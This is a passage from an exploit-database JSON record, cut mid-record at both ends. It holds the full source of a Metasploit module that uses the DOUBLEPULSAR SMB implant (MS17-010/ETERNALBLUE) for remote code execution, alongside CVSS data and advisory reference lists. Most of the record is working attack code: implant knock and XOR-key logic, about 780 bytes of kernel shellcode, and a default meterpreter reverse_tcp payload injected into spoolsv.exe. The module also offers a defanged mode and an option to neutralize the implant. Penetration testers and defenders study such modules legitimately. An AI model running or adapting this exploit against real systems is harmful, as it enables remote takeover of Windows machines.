["CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "kitploit", "idList": 
["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-02T22:12:39", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-02T22:12:39", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: 
https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' 
=> 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-11-04] #"}, "lastseen": "2021-11-03T22:13:48", "differentElements": ["sourceData"], "edition": 64}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "a8b2704d0e9c8615f952cbe7ab1d5421", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-11-04T22:15:36", "history": [], "viewCount": 113, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": 
"trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-04T22:15:36", "rev": 2}, "score": 